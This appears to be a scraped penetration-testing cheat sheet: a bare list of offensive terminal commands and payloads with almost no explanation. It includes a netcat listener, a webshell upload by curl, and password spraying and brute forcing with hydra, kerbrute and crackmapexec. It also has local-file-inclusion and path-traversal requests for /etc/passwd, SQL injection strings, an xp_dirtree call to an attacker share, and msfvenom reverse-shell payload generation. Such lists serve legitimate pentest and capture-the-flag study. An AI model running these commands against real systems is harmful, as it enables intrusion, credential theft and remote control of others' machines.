nc -nvlp 1234
Alert! To view more content, click the description below a terminal command.
nc -nvlp 1234
ls -la /usr/share/webshells
crackmapexec smb target -u users -p pass --continue-on-success
ssh-keygen
curl --upload-file shell.php target/uploads/
hashcat -a 0 -m mode hashes.txt wordlist
hydra http-get /manager/
hydra http-form-post target
kerbrute passwordspray -d domain users.txt password
john --wordlist=rockyou.txt hashes.txt
curl with poisoned User-Agent then include log
curl 'target/page=php://filter/convert.base64-encode/resource=admin.php'
cat - background.jpg > evil.jpg
curl 'target/page.php?file=../../../../etc/passwd'
manual checklist
impacket-mssqlclient user:pass@target -windows-auth
xp_dirtree \\attacker\share
search type:exploit name:keyword
msfconsole use exploit/multi/handler
' UNION SELECT 1,2,3 #
<?php phpinfo(); ?>
patator http_fuzz url=target user_pass=user:FILE0
hydra -l user -P pass target smb
' OR '1'='1
python3 -c 'import pty;pty.spawn("/bin/bash")'
nmap --script=http-shellshock target
msfconsole use scanner/http/tomcat_mgr_login
wmap_run -t
cadaver http://target/webdav
malicious.js
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shell.exe